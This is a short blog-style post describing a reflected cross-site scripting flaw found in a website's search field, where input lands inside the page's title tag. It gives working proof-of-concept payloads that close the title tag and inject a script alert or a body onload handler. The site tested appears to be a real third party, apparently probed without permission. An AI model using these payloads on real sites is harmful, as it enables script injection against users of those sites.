I was kind of looking (pentester way) on a website and I saw that they could have a XSS flaw on the search field. Inserting the following string „<b>tester” on the search field, it get reflected back but just on the <title> tag like this.

<title>Cauta <b>tester – ……………</title>

There is a classical XSS, but what made that one interesting to me was the <title> tag.

<title>Cauta<script>alert(1);</script> – ……………</title>  => is not working

but

</title><script>alert(1)</script>&submit=Cauta => is working

Speaking with a friend, he gave me also an alternative the idea of inserting the <body> tag and create in this way a new HTML document.

So:

</title><body onload=’javascript:alert(1)’>

worked also like a charm.

Anunțuri